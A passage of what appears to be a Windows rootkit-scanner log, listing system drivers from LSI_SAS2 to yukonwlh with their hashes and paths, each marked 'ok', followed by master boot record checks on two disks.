    23:37:45.0108 5248 LSI_SAS2 (dc9dc3d3daa0e276fd2ec262e38b11e9) C:\Windows\system32\DRIVERS\lsi_sas2.sys
    23:37:45.0109 5248 LSI_SAS2 - ok
    23:37:45.0225 5248 LSI_SCSI (0a036c7d7cab643a7f07135ac47e0524) C:\Windows\system32\DRIVERS\lsi_scsi.sys
    23:37:45.0227 5248 LSI_SCSI - ok
    23:37:45.0365 5248 luafv (6703e366cc18d3b6e534f5cf7df39cee) C:\Windows\system32\drivers\luafv.sys
    23:37:45.0367 5248 luafv - ok
    23:37:45.0556 5248 mdmxsdk (0cea2d0d3fa284b85ed5b68365114f76) C:\Windows\system32\DRIVERS\mdmxsdk.sys
    23:37:45.0557 5248 mdmxsdk - ok
    23:37:45.0695 5248 megasas (0fff5b045293002ab38eb1fd1fc2fb74) C:\Windows\system32\DRIVERS\megasas.sys
    23:37:45.0696 5248 megasas - ok
    23:37:45.0824 5248 MegaSR (dcbab2920c75f390caf1d29f675d03d6) C:\Windows\system32\DRIVERS\MegaSR.sys
    23:37:45.0827 5248 MegaSR - ok
    23:37:45.0968 5248 Modem (f001861e5700ee84e2d4e52c712f4964) C:\Windows\system32\drivers\modem.sys
    23:37:45.0969 5248 Modem - ok
    23:37:46.0098 5248 monitor (79d10964de86b292320e9dfe02282a23) C:\Windows\system32\DRIVERS\monitor.sys
    23:37:46.0098 5248 monitor - ok
    23:37:46.0229 5248 mouclass (fb18cc1d4c2e716b6b903b0ac0cc0609) C:\Windows\system32\DRIVERS\mouclass.sys
    23:37:46.0229 5248 mouclass - ok
    23:37:46.0415 5248 mouhid (2c388d2cd01c9042596cf3c8f3c7b24d) C:\Windows\system32\DRIVERS\mouhid.sys
    23:37:46.0416 5248 mouhid - ok
    23:37:46.0539 5248 mountmgr (fc8771f45ecccfd89684e38842539b9b) C:\Windows\system32\drivers\mountmgr.sys
    23:37:46.0540 5248 mountmgr - ok
    23:37:46.0654 5248 mpio (2d699fb6e89ce0d8da14ecc03b3edfe0) C:\Windows\system32\drivers\mpio.sys
    23:37:46.0656 5248 mpio - ok
    23:37:46.0775 5248 mpsdrv (ad2723a7b53dd1aacae6ad8c0bfbf4d0) C:\Windows\system32\drivers\mpsdrv.sys
    23:37:46.0776 5248 mpsdrv - ok
    23:37:46.0907 5248 MRxDAV (ceb46ab7c01c9f825f8cc6babc18166a) C:\Windows\system32\drivers\mrxdav.sys
    23:37:46.0909 5248 MRxDAV - ok
    23:37:47.0062 5248 mrxsmb (5d16c921e3671636c0eba3bbaac5fd25) C:\Windows\system32\DRIVERS\mrxsmb.sys
    23:37:47.0063 5248 mrxsmb - ok
    23:37:47.0210 5248 mrxsmb10 (6d17a4791aca19328c685d256349fefc) C:\Windows\system32\DRIVERS\mrxsmb10.sys
    23:37:47.0214 5248 mrxsmb10 - ok
    23:37:47.0328 5248 mrxsmb20 (b81f204d146000be76651a50670a5e9e) C:\Windows\system32\DRIVERS\mrxsmb20.sys
    23:37:47.0330 5248 mrxsmb20 - ok
    23:37:47.0456 5248 msahci (012c5f4e9349e711e11e0f19a8589f0a) C:\Windows\system32\drivers\msahci.sys
    23:37:47.0457 5248 msahci - ok
    23:37:47.0586 5248 msdsm (55055f8ad8be27a64c831322a780a228) C:\Windows\system32\drivers\msdsm.sys
    23:37:47.0588 5248 msdsm - ok
    23:37:47.0736 5248 Msfs (daefb28e3af5a76abcc2c3078c07327f) C:\Windows\system32\drivers\Msfs.sys
    23:37:47.0737 5248 Msfs - ok
    23:37:47.0848 5248 mshidkmdf (3e1e5767043c5af9367f0056295e9f84) C:\Windows\System32\drivers\mshidkmdf.sys
    23:37:47.0849 5248 mshidkmdf - ok
    23:37:47.0967 5248 msisadrv (0a4e5757ae09fa9622e3158cc1aef114) C:\Windows\system32\drivers\msisadrv.sys
    23:37:47.0967 5248 msisadrv - ok
    23:37:48.0142 5248 MSKSSRV (8c0860d6366aaffb6c5bb9df9448e631) C:\Windows\system32\drivers\MSKSSRV.sys
    23:37:48.0143 5248 MSKSSRV - ok
    23:37:48.0302 5248 MSPCLOCK (3ea8b949f963562cedbb549eac0c11ce) C:\Windows\system32\drivers\MSPCLOCK.sys
    23:37:48.0303 5248 MSPCLOCK - ok
    23:37:48.0465 5248 MSPQM (f456e973590d663b1073e9c463b40932) C:\Windows\system32\drivers\MSPQM.sys
    23:37:48.0466 5248 MSPQM - ok
    23:37:48.0601 5248 MsRPC (0e008fc4819d238c51d7c93e7b41e560) C:\Windows\system32\drivers\MsRPC.sys
    23:37:48.0603 5248 MsRPC - ok
    23:37:48.0723 5248 mssmbios (fc6b9ff600cc585ea38b12589bd4e246) C:\Windows\system32\drivers\mssmbios.sys
    23:37:48.0724 5248 mssmbios - ok
    23:37:48.0879 5248 MSTEE (b42c6b921f61a6e55159b8be6cd54a36) C:\Windows\system32\drivers\MSTEE.sys
    23:37:48.0879 5248 MSTEE - ok
    23:37:49.0010 5248 MTConfig (33599130f44e1f34631cea241de8ac84) C:\Windows\system32\DRIVERS\MTConfig.sys
    23:37:49.0010 5248 MTConfig - ok
    23:37:49.0138 5248 Mup (159fad02f64e6381758c990f753bcc80) C:\Windows\system32\Drivers\mup.sys
    23:37:49.0138 5248 Mup - ok
    23:37:49.0303 5248 NativeWifiP (26384429fcd85d83746f63e798ab1480) C:\Windows\system32\DRIVERS\nwifi.sys
    23:37:49.0307 5248 NativeWifiP - ok
    23:37:49.0484 5248 NDIS (e7c54812a2aaf43316eb6930c1ffa108) C:\Windows\system32\drivers\ndis.sys
    23:37:49.0493 5248 NDIS - ok
    23:37:49.0645 5248 NdisCap (0e1787aa6c9191d3d319e8bafe86f80c) C:\Windows\system32\DRIVERS\ndiscap.sys
    23:37:49.0647 5248 NdisCap - ok
    23:37:49.0800 5248 NdisTapi (e4a8aec125a2e43a9e32afeea7c9c888) C:\Windows\system32\DRIVERS\ndistapi.sys
    23:37:49.0801 5248 NdisTapi - ok
    23:37:49.0975 5248 Ndisuio (d8a65dafb3eb41cbb622745676fcd072) C:\Windows\system32\DRIVERS\ndisuio.sys
    23:37:49.0976 5248 Ndisuio - ok
    23:37:50.0083 5248 NdisWan (38fbe267e7e6983311179230facb1017) C:\Windows\system32\DRIVERS\ndiswan.sys
    23:37:50.0085 5248 NdisWan - ok
    23:37:50.0168 5248 NDProxy (a4bdc541e69674fbff1a8ff00be913f2) C:\Windows\system32\drivers\NDProxy.sys
    23:37:50.0169 5248 NDProxy - ok
    23:37:50.0350 5248 NetBIOS (80b275b1ce3b0e79909db7b39af74d51) C:\Windows\system32\DRIVERS\netbios.sys
    23:37:50.0351 5248 NetBIOS - ok
    23:37:50.0486 5248 NetBT (40616222ca8805aa030545a5b0ccdb63) C:\Windows\system32\DRIVERS\netbt.sys
    23:37:50.0487 5248 NetBT - ok
    23:37:50.0831 5248 netw5v32 (af1ae2e42b03395560b1cde03230205c) C:\Windows\system32\DRIVERS\netw5v32.sys
    23:37:50.0933 5248 netw5v32 - ok
    23:37:51.0091 5248 nfrd960 (1d85c4b390b0ee09c7a46b91efb2c097) C:\Windows\system32\DRIVERS\nfrd960.sys
    23:37:51.0092 5248 nfrd960 - ok
    23:37:51.0255 5248 nmwcd (48fb907b069524f2dc7ba62a0762850c) C:\Windows\system32\drivers\ccdcmb.sys
    23:37:51.0256 5248 nmwcd - ok
    23:37:51.0411 5248 nmwcdc (2914ceb789964141ac6e22c6bc980c42) C:\Windows\system32\drivers\ccdcmbo.sys
    23:37:51.0412 5248 nmwcdc - ok
    23:37:51.0570 5248 nmwcdnsu (28d40797bcb050321fa6674b08a620c0) C:\Windows\system32\drivers\nmwcdnsu.sys
    23:37:51.0573 5248 nmwcdnsu - ok
    23:37:51.0742 5248 nmwcdnsuc (7804e9747bc27eddc6a8382bbf35cf25) C:\Windows\system32\drivers\nmwcdnsuc.sys
    23:37:51.0743 5248 nmwcdnsuc - ok
    23:37:51.0893 5248 Npfs (1db262a9f8c087e8153d89bef3d2235f) C:\Windows\system32\drivers\Npfs.sys
    23:37:51.0894 5248 Npfs - ok
    23:37:52.0000 5248 nsiproxy (e9a0a4d07e53d8fea2bb8387a3293c58) C:\Windows\system32\drivers\nsiproxy.sys
    23:37:52.0001 5248 nsiproxy - ok
    23:37:52.0176 5248 Ntfs (81189c3d7763838e55c397759d49007a) C:\Windows\system32\drivers\Ntfs.sys
    23:37:52.0191 5248 Ntfs - ok
    23:37:52.0301 5248 Null (f9756a98d69098dca8945d62858a812c) C:\Windows\system32\drivers\Null.sys
    23:37:52.0301 5248 Null - ok
    23:37:52.0493 5248 NVHDA (d2f4c4b22969236382ca853b8daa2d4e) C:\Windows\system32\drivers\nvhda32v.sys
    23:37:52.0493 5248 NVHDA - ok
    23:37:52.0834 5248 nvlddmkm (8dfdcffabd7ab73cab9c738c3b7dccf4) C:\Windows\system32\DRIVERS\nvlddmkm.sys
    23:37:53.0047 5248 nvlddmkm - ok
    23:37:53.0173 5248 nvraid (b3e25ee28883877076e0e1ff877d02e0) C:\Windows\system32\drivers\nvraid.sys
    23:37:53.0175 5248 nvraid - ok
    23:37:53.0285 5248 nvstor (4380e59a170d88c4f1022eff6719a8a4) C:\Windows\system32\drivers\nvstor.sys
    23:37:53.0288 5248 nvstor - ok
    23:37:53.0435 5248 nv_agp (5a0983915f02bae73267cc2a041f717d) C:\Windows\system32\drivers\nv_agp.sys
    23:37:53.0436 5248 nv_agp - ok
    23:37:53.0571 5248 ohci1394 (08a70a1f2cdde9bb49b885cb817a66eb) C:\Windows\system32\drivers\ohci1394.sys
    23:37:53.0572 5248 ohci1394 - ok
    23:37:53.0759 5248 Parport (2ea877ed5dd9713c5ac74e8ea7348d14) C:\Windows\system32\DRIVERS\parport.sys
    23:37:53.0761 5248 Parport - ok
    23:37:53.0899 5248 partmgr (bf8f6af06da75b336f07e23aef97d93b) C:\Windows\system32\drivers\partmgr.sys
    23:37:53.0900 5248 partmgr - ok
    23:37:53.0991 5248 Parvdm (eb0a59f29c19b86479d36b35983daadc) C:\Windows\system32\DRIVERS\parvdm.sys
    23:37:53.0992 5248 Parvdm - ok
    23:37:54.0126 5248 pccsmcfd (fd2041e9ba03db7764b2248f02475079) C:\Windows\system32\DRIVERS\pccsmcfd.sys
    23:37:54.0127 5248 pccsmcfd - ok
    23:37:54.0289 5248 pci (673e55c3498eb970088e812ea820aa8f) C:\Windows\system32\drivers\pci.sys
    23:37:54.0291 5248 pci - ok
    23:37:54.0444 5248 pciide (afe86f419014db4e5593f69ffe26ce0a) C:\Windows\system32\drivers\pciide.sys
    23:37:54.0445 5248 pciide - ok
    23:37:54.0578 5248 pcmcia (f396431b31693e71e8a80687ef523506) C:\Windows\system32\DRIVERS\pcmcia.sys
    23:37:54.0581 5248 pcmcia - ok
    23:37:54.0695 5248 pcw (250f6b43d2b613172035c6747aeeb19f) C:\Windows\system32\drivers\pcw.sys
    23:37:54.0696 5248 pcw - ok
    23:37:54.0828 5248 PEAUTH (9e0104ba49f4e6973749a02bf41344ed) C:\Windows\system32\drivers\peauth.sys
    23:37:54.0836 5248 PEAUTH - ok
    23:37:55.0090 5248 PptpMiniport (631e3e205ad6d86f2aed6a4a8e69f2db) C:\Windows\system32\DRIVERS\raspptp.sys
    23:37:55.0092 5248 PptpMiniport - ok
    23:37:55.0219 5248 Processor (85b1e3a0c7585bc4aae6899ec6fcf011) C:\Windows\system32\DRIVERS\processr.sys
    23:37:55.0221 5248 Processor - ok
    23:37:55.0382 5248 Psched (6270ccae2a86de6d146529fe55b3246a) C:\Windows\system32\DRIVERS\pacer.sys
    23:37:55.0383 5248 Psched - ok
    23:37:55.0526 5248 PxHelp20 (e42e3433dbb4cffe8fdd91eab29aea8e) C:\Windows\system32\Drivers\PxHelp20.sys
    23:37:55.0527 5248 PxHelp20 - ok
    23:37:55.0689 5248 ql2300 (ab95ecf1f6659a60ddc166d8315b0751) C:\Windows\system32\DRIVERS\ql2300.sys
    23:37:55.0706 5248 ql2300 - ok
    23:37:55.0827 5248 ql40xx (b4dd51dd25182244b86737dc51af2270) C:\Windows\system32\DRIVERS\ql40xx.sys
    23:37:55.0829 5248 ql40xx - ok
    23:37:55.0952 5248 QWAVEdrv (584078ca1b95ca72df2a27c336f9719d) C:\Windows\system32\drivers\qwavedrv.sys
    23:37:55.0953 5248 QWAVEdrv - ok
    23:37:56.0060 5248 RasAcd (30a81b53c766d0133bb86d234e5556ab) C:\Windows\system32\DRIVERS\rasacd.sys
    23:37:56.0061 5248 RasAcd - ok
    23:37:56.0220 5248 RasAgileVpn (57ec4aef73660166074d8f7f31c0d4fd) C:\Windows\system32\DRIVERS\AgileVpn.sys
    23:37:56.0221 5248 RasAgileVpn - ok
    23:37:56.0422 5248 Rasl2tp (d9f91eafec2815365cbe6d167e4e332a) C:\Windows\system32\DRIVERS\rasl2tp.sys
    23:37:56.0424 5248 Rasl2tp - ok
    23:37:56.0579 5248 RasPppoe (0fe8b15916307a6ac12bfb6a63e45507) C:\Windows\system32\DRIVERS\raspppoe.sys
    23:37:56.0581 5248 RasPppoe - ok
    23:37:56.0745 5248 RasSstp (44101f495a83ea6401d886e7fd70096b) C:\Windows\system32\DRIVERS\rassstp.sys
    23:37:56.0746 5248 RasSstp - ok
    23:37:56.0890 5248 rdbss (d528bc58a489409ba40334ebf96a311b) C:\Windows\system32\DRIVERS\rdbss.sys
    23:37:56.0894 5248 rdbss - ok
    23:37:57.0057 5248 rdpbus (0d8f05481cb76e70e1da06ee9f0da9df) C:\Windows\system32\DRIVERS\rdpbus.sys
    23:37:57.0058 5248 rdpbus - ok
    23:37:57.0195 5248 RDPCDD (23dae03f29d253ae74c44f99e515f9a1) C:\Windows\system32\DRIVERS\RDPCDD.sys
    23:37:57.0196 5248 RDPCDD - ok
    23:37:57.0352 5248 RDPENCDD (5a53ca1598dd4156d44196d200c94b8a) C:\Windows\system32\drivers\rdpencdd.sys
    23:37:57.0352 5248 RDPENCDD - ok
    23:37:57.0459 5248 RDPREFMP (44b0a53cd4f27d50ed461dae0c0b4e1f) C:\Windows\system32\drivers\rdprefmp.sys
    23:37:57.0459 5248 RDPREFMP - ok
    23:37:57.0578 5248 RDPWD (288b06960d78428ff89e811632684e20) C:\Windows\system32\drivers\RDPWD.sys
    23:37:57.0581 5248 RDPWD - ok
    23:37:57.0743 5248 rdyboost (518395321dc96fe2c9f0e96ac743b656) C:\Windows\system32\drivers\rdyboost.sys
    23:37:57.0746 5248 rdyboost - ok
    23:37:57.0844 5248 regi (001b4278407f4303efc902a2b16f2453) C:\Windows\system32\drivers\regi.sys
    23:37:57.0845 5248 regi - ok
    23:37:58.0012 5248 RFCOMM (cb928d9e6daf51879dd6ba8d02f01321) C:\Windows\system32\DRIVERS\rfcomm.sys
    23:37:58.0014 5248 RFCOMM - ok
    23:37:58.0149 5248 rimsptsk (f7d9ecf41ebd3cf6c65944368150f66b) C:\Windows\system32\DRIVERS\rimsptsk.sys
    23:37:58.0150 5248 rimsptsk - ok
    23:37:58.0318 5248 risdptsk (1be6c42767a7c67ba31ae32b293b37a3) C:\Windows\system32\DRIVERS\risdptsk.sys
    23:37:58.0319 5248 risdptsk - ok
    23:37:58.0499 5248 rspndr (032b0d36ad92b582d869879f5af5b928) C:\Windows\system32\DRIVERS\rspndr.sys
    23:37:58.0501 5248 rspndr - ok
    23:37:58.0678 5248 sbp2port (05d860da1040f111503ac416ccef2bca) C:\Windows\system32\drivers\sbp2port.sys
    23:37:58.0682 5248 sbp2port - ok
    23:37:58.0810 5248 scfilter (0693b5ec673e34dc147e195779a4dcf6) C:\Windows\system32\DRIVERS\scfilter.sys
    23:37:58.0811 5248 scfilter - ok
    23:37:59.0004 5248 secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
    23:37:59.0005 5248 secdrv - ok
    23:37:59.0165 5248 Serenum (9ad8b8b515e3df6acd4212ef465de2d1) C:\Windows\system32\DRIVERS\serenum.sys
    23:37:59.0166 5248 Serenum - ok
    23:37:59.0290 5248 Serial (5fb7fcea0490d821f26f39cc5ea3d1e2) C:\Windows\system32\DRIVERS\serial.sys
    23:37:59.0292 5248 Serial - ok
    23:37:59.0400 5248 sermouse (79bffb520327ff916a582dfea17aa813) C:\Windows\system32\DRIVERS\sermouse.sys
    23:37:59.0403 5248 sermouse - ok
    23:37:59.0548 5248 SFEP (8b7c1768d2cde2e02e09a66563ddfd16) C:\Windows\system32\DRIVERS\SFEP.sys
    23:37:59.0548 5248 SFEP - ok
    23:37:59.0672 5248 sffdisk (9f976e1eb233df46fce808d9dea3eb9c) C:\Windows\system32\drivers\sffdisk.sys
    23:37:59.0673 5248 sffdisk - ok
    23:37:59.0792 5248 sffp_mmc (932a68ee27833cfd57c1639d375f2731) C:\Windows\system32\drivers\sffp_mmc.sys
    23:37:59.0792 5248 sffp_mmc - ok
    23:37:59.0909 5248 sffp_sd (6d4ccaedc018f1cf52866bbbaa235982) C:\Windows\system32\drivers\sffp_sd.sys
    23:37:59.0910 5248 sffp_sd - ok
    23:37:59.0951 5248 sfloppy (db96666cc8312ebc45032f30b007a547) C:\Windows\system32\DRIVERS\sfloppy.sys
    23:37:59.0952 5248 sfloppy - ok
    23:38:00.0112 5248 sisagp (2565cac0dc9fe0371bdce60832582b2e) C:\Windows\system32\drivers\sisagp.sys
    23:38:00.0113 5248 sisagp - ok
    23:38:00.0275 5248 SiSRaid2 (a9f0486851becb6dda1d89d381e71055) C:\Windows\system32\DRIVERS\SiSRaid2.sys
    23:38:00.0276 5248 SiSRaid2 - ok
    23:38:00.0432 5248 SiSRaid4 (3727097b55738e2f554972c3be5bc1aa) C:\Windows\system32\DRIVERS\sisraid4.sys
    23:38:00.0434 5248 SiSRaid4 - ok
    23:38:00.0574 5248 Smb (3e21c083b8a01cb70ba1f09303010fce) C:\Windows\system32\DRIVERS\smb.sys
    23:38:00.0576 5248 Smb - ok
    23:38:00.0765 5248 spldr (95cf1ae7527fb70f7816563cbc09d942) C:\Windows\system32\drivers\spldr.sys
    23:38:00.0766 5248 spldr - ok
    23:38:00.0943 5248 srv (e4c2764065d66ea1d2d3ebc28fe99c46) C:\Windows\system32\DRIVERS\srv.sys
    23:38:00.0948 5248 srv - ok
    23:38:01.0115 5248 srv2 (03f0545bd8d4c77fa0ae1ceedfcc71ab) C:\Windows\system32\DRIVERS\srv2.sys
    23:38:01.0120 5248 srv2 - ok
    23:38:01.0240 5248 srvnet (be6bd660caa6f291ae06a718a4fa8abc) C:\Windows\system32\DRIVERS\srvnet.sys
    23:38:01.0241 5248 srvnet - ok
    23:38:01.0400 5248 stexstor (db32d325c192b801df274bfd12a7e72b) C:\Windows\system32\DRIVERS\stexstor.sys
    23:38:01.0401 5248 stexstor - ok
    23:38:01.0542 5248 StillCam (edb05bd63148796f23ea78506404a538) C:\Windows\system32\DRIVERS\serscan.sys
    23:38:01.0543 5248 StillCam - ok
    23:38:01.0702 5248 swenum (e58c78a848add9610a4db6d214af5224) C:\Windows\system32\drivers\swenum.sys
    23:38:01.0703 5248 swenum - ok
    23:38:01.0882 5248 SynTP (99da94793332aadbb17bbb521ae56e21) C:\Windows\system32\DRIVERS\SynTP.sys
    23:38:01.0883 5248 SynTP - ok
    23:38:02.0099 5248 Tcpip (04e4a7d53a7ace02e8c55b17a498f631) C:\Windows\system32\drivers\tcpip.sys
    23:38:02.0115 5248 Tcpip - ok
    23:38:02.0299 5248 TCPIP6 (04e4a7d53a7ace02e8c55b17a498f631) C:\Windows\system32\DRIVERS\tcpip.sys
    23:38:02.0306 5248 TCPIP6 - ok
    23:38:02.0505 5248 tcpipreg (cca24162e055c3714ce5a88b100c64ed) C:\Windows\system32\drivers\tcpipreg.sys
    23:38:02.0506 5248 tcpipreg - ok
    23:38:02.0668 5248 TcUsb (55fe712f574da1a726ad74b20886a529) C:\Windows\system32\Drivers\tcusb.sys
    23:38:02.0669 5248 TcUsb - ok
    23:38:02.0803 5248 TDPIPE (1cb91b2bd8f6dd367dfc2ef26fd751b2) C:\Windows\system32\drivers\tdpipe.sys
    23:38:02.0804 5248 TDPIPE - ok
    23:38:02.0933 5248 TDTCP (2c10395baa4847f83042813c515cc289) C:\Windows\system32\drivers\tdtcp.sys
    23:38:02.0934 5248 TDTCP - ok
    23:38:03.0088 5248 tdx (b459575348c20e8121d6039da063c704) C:\Windows\system32\DRIVERS\tdx.sys
    23:38:03.0090 5248 tdx - ok
    23:38:03.0240 5248 TermDD (04dbf4b01ea4bf25a9a3e84affac9b20) C:\Windows\system32\drivers\termdd.sys
    23:38:03.0241 5248 TermDD - ok
    23:38:03.0478 5248 TrueSight (f69641efdb19acb4753b0155f7fdeed5) c:\windows\system32\drivers\TrueSight.sys
    23:38:03.0479 5248 TrueSight - ok
    23:38:03.0594 5248 tssecsrv (254bb140eee3c59d6114c1a86b636877) C:\Windows\system32\DRIVERS\tssecsrv.sys
    23:38:03.0596 5248 tssecsrv - ok
    23:38:03.0683 5248 TsUsbFlt (fd1d6c73e6333be727cbcc6054247654) C:\Windows\system32\drivers\tsusbflt.sys
    23:38:03.0685 5248 TsUsbFlt - ok
    23:38:03.0878 5248 tunnel (b2fa25d9b17a68bb93d58b0556e8c90d) C:\Windows\system32\DRIVERS\tunnel.sys
    23:38:03.0880 5248 tunnel - ok
    23:38:04.0002 5248 uagp35 (750fbcb269f4d7dd2e420c56b795db6d) C:\Windows\system32\DRIVERS\uagp35.sys
    23:38:04.0004 5248 uagp35 - ok
    23:38:04.0138 5248 udfs (ee43346c7e4b5e63e54f927babbb32ff) C:\Windows\system32\DRIVERS\udfs.sys
    23:38:04.0142 5248 udfs - ok
    23:38:04.0303 5248 uliagpkx (44e8048ace47befbfdc2e9be4cbc8880) C:\Windows\system32\drivers\uliagpkx.sys
    23:38:04.0305 5248 uliagpkx - ok
    23:38:04.0439 5248 umbus (d295bed4b898f0fd999fcfa9b32b071b) C:\Windows\system32\drivers\umbus.sys
    23:38:04.0441 5248 umbus - ok
    23:38:04.0491 5248 UmPass (7550ad0c6998ba1cb4843e920ee0feac) C:\Windows\system32\DRIVERS\umpass.sys
    23:38:04.0492 5248 UmPass - ok
    23:38:04.0644 5248 upperdev (e526a166e6acafd0a9b3841d3941669e) C:\Windows\system32\DRIVERS\usbser_lowerflt.sys
    23:38:04.0645 5248 upperdev - ok
    23:38:04.0788 5248 usbccgp (bd9c55d7023c5de374507acc7a14e2ac) C:\Windows\system32\DRIVERS\usbccgp.sys
    23:38:04.0790 5248 usbccgp - ok
    23:38:04.0944 5248 usbcir (04ec7cec62ec3b6d9354eee93327fc82) C:\Windows\system32\drivers\usbcir.sys
    23:38:04.0946 5248 usbcir - ok
    23:38:05.0098 5248 usbehci (f92de757e4b7ce9c07c5e65423f3ae3b) C:\Windows\system32\drivers\usbehci.sys
    23:38:05.0099 5248 usbehci - ok
    23:38:05.0246 5248 usbhub (8dc94aec6a7e644a06135ae7506dc2e9) C:\Windows\system32\DRIVERS\usbhub.sys
    23:38:05.0250 5248 usbhub - ok
    23:38:05.0359 5248 usbohci (e185d44fac515a18d9deddc23c2cdf44) C:\Windows\system32\drivers\usbohci.sys
    23:38:05.0360 5248 usbohci - ok
    23:38:05.0521 5248 usbprint (797d862fe0875e75c7cc4c1ad7b30252) C:\Windows\system32\DRIVERS\usbprint.sys
    23:38:05.0522 5248 usbprint - ok
    23:38:05.0674 5248 usbscan (576096ccbc07e7c4ea4f5e6686d6888f) C:\Windows\system32\DRIVERS\usbscan.sys
    23:38:05.0675 5248 usbscan - ok
    23:38:05.0861 5248 usbser (31181de6190b39fc8007dffd1a48ffd6) C:\Windows\system32\drivers\usbser.sys
    23:38:05.0862 5248 usbser - ok
    23:38:06.0010 5248 UsbserFilt (6f3e3c6811b930d2414552a2e4a40f36) C:\Windows\system32\DRIVERS\usbser_lowerfltj.sys
    23:38:06.0011 5248 UsbserFilt - ok
    23:38:06.0123 5248 USBSTOR (f991ab9cc6b908db552166768176896a) C:\Windows\system32\DRIVERS\USBSTOR.SYS
    23:38:06.0124 5248 USBSTOR - ok
    23:38:06.0241 5248 usbuhci (68df884cf41cdada664beb01daf67e3d) C:\Windows\system32\drivers\usbuhci.sys
    23:38:06.0242 5248 usbuhci - ok
    23:38:06.0404 5248 usbvideo (45f4e7bf43db40a6c6b4d92c76cbc3f2) C:\Windows\System32\Drivers\usbvideo.sys
    23:38:06.0407 5248 usbvideo - ok
    23:38:06.0590 5248 vdrvroot (a059c4c3edb09e07d21a8e5c0aabd3cb) C:\Windows\system32\drivers\vdrvroot.sys
    23:38:06.0591 5248 vdrvroot - ok
    23:38:06.0731 5248 vga (17c408214ea61696cec9c66e388b14f3) C:\Windows\system32\DRIVERS\vgapnp.sys
    23:38:06.0733 5248 vga - ok
    23:38:06.0850 5248 VgaSave (8e38096ad5c8570a6f1570a61e251561) C:\Windows\System32\drivers\vga.sys
    23:38:06.0851 5248 VgaSave - ok
    23:38:06.0999 5248 vhdmp (5461686cca2fda57b024547733ab42e3) C:\Windows\system32\drivers\vhdmp.sys
    23:38:07.0002 5248 vhdmp - ok
    23:38:07.0146 5248 viaagp (c829317a37b4bea8f39735d4b076e923) C:\Windows\system32\drivers\viaagp.sys
    23:38:07.0147 5248 viaagp - ok
    23:38:07.0206 5248 ViaC7 (e02f079a6aa107f06b16549c6e5c7b74) C:\Windows\system32\DRIVERS\viac7.sys
    23:38:07.0207 5248 ViaC7 - ok
    23:38:07.0285 5248 viaide (e43574f6a56a0ee11809b48c09e4fd3c) C:\Windows\system32\drivers\viaide.sys
    23:38:07.0286 5248 viaide - ok
    23:38:07.0425 5248 volmgr (4c63e00f2f4b5f86ab48a58cd990f212) C:\Windows\system32\drivers\volmgr.sys
    23:38:07.0425 5248 volmgr - ok
    23:38:07.0560 5248 volmgrx (b5bb72067ddddbbfb04b2f89ff8c3c87) C:\Windows\system32\drivers\volmgrx.sys
    23:38:07.0564 5248 volmgrx - ok
    23:38:07.0679 5248 volsnap (f497f67932c6fa693d7de2780631cfe7) C:\Windows\system32\drivers\volsnap.sys
    23:38:07.0684 5248 volsnap - ok
    23:38:07.0854 5248 vsmraid (9dfa0cc2f8855a04816729651175b631) C:\Windows\system32\DRIVERS\vsmraid.sys
    23:38:07.0857 5248 vsmraid - ok
    23:38:08.0022 5248 vwifibus (90567b1e658001e79d7c8bbd3dde5aa6) C:\Windows\System32\drivers\vwifibus.sys
    23:38:08.0023 5248 vwifibus - ok
    23:38:08.0162 5248 WacomPen (de3721e89c653aa281428c8a69745d90) C:\Windows\system32\DRIVERS\wacompen.sys
    23:38:08.0163 5248 WacomPen - ok
    23:38:08.0307 5248 WANARP (3c3c78515f5ab448b022bdf5b8ffdd2e) C:\Windows\system32\DRIVERS\wanarp.sys
    23:38:08.0308 5248 WANARP - ok
    23:38:08.0313 5248 Wanarpv6 (3c3c78515f5ab448b022bdf5b8ffdd2e) C:\Windows\system32\DRIVERS\wanarp.sys
    23:38:08.0314 5248 Wanarpv6 - ok
    23:38:08.0496 5248 Wd (1112a9badacb47b7c0bb0392e3158dff) C:\Windows\system32\DRIVERS\wd.sys
    23:38:08.0497 5248 Wd - ok
    23:38:08.0645 5248 Wdf01000 (9950e3d0f08141c7e89e64456ae7dc73) C:\Windows\system32\drivers\Wdf01000.sys
    23:38:08.0651 5248 Wdf01000 - ok
    23:38:08.0831 5248 WfpLwf (8b9a943f3b53861f2bfaf6c186168f79) C:\Windows\system32\DRIVERS\wfplwf.sys
    23:38:08.0832 5248 WfpLwf - ok
    23:38:08.0948 5248 WimFltr (090a2b8f055343815556a01f725f6c35) C:\Windows\system32\DRIVERS\wimfltr.sys
    23:38:08.0951 5248 WimFltr - ok
    23:38:09.0074 5248 WIMMount (5cf95b35e59e2a38023836fff31be64c) C:\Windows\system32\drivers\wimmount.sys
    23:38:09.0075 5248 WIMMount - ok
    23:38:09.0263 5248 winachsf (5a77ac34a0ffb70ce8b35b524fede9ba) C:\Windows\system32\DRIVERS\HSX_CNXT.sys
    23:38:09.0272 5248 winachsf - ok
    23:38:09.0455 5248 WinUsb (a67e5f9a400f3bd1be3d80613b45f708) C:\Windows\system32\DRIVERS\WinUsb.sys
    23:38:09.0456 5248 WinUsb - ok
    23:38:09.0643 5248 WmiAcpi (0217679b8fca58714c3bf2726d2ca84e) C:\Windows\system32\drivers\wmiacpi.sys
    23:38:09.0644 5248 WmiAcpi - ok
    23:38:09.0806 5248 ws2ifsl (6db3276587b853bf886b69528fdb048c) C:\Windows\system32\drivers\ws2ifsl.sys
    23:38:09.0807 5248 ws2ifsl - ok
    23:38:09.0980 5248 WudfPf (e714a1c0354636837e20ccbf00888ee7) C:\Windows\system32\drivers\WudfPf.sys
    23:38:09.0982 5248 WudfPf - ok
    23:38:10.0145 5248 WUDFRd (1023ee888c9b47178c5293ed5336ab69) C:\Windows\system32\DRIVERS\WUDFRd.sys
    23:38:10.0147 5248 WUDFRd - ok
    23:38:10.0302 5248 XAudio (88af537264f2b818da15479ceeaf5d7c) C:\Windows\system32\DRIVERS\xaudio.sys
    23:38:10.0302 5248 XAudio - ok
    23:38:10.0457 5248 yukonw7 (b07c5b7efdf936ff93d4f540938725be) C:\Windows\system32\DRIVERS\yk62x86.sys
    23:38:10.0462 5248 yukonw7 - ok
    23:38:10.0589 5248 yukonwlh (780e78694485d405413ae67fade0bc3f) C:\Windows\system32\DRIVERS\yk60x86.sys
    23:38:10.0593 5248 yukonwlh - ok
    23:38:10.0658 5248 MBR (0x1B8) (a36c5e4f47e84449ff07ed3517b43a31) \Device\Harddisk0\DR0
    23:38:10.0677 5248 \Device\Harddisk0\DR0 - ok
    23:38:10.0682 5248 MBR (0x1B8) (e5fa06aca0d60ba9c870d0ef3d9898c9) \Device\Harddisk3\DR4
